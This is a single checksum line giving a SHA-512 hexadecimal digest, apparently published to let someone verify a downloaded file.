SHA5120322a7371646237aeca9ac66484ec11639192f879813ab43f53b19ad68f7098bd153f42899d31961facb917e526a5ef8c1c4a06848153986abf85dbf56ee3296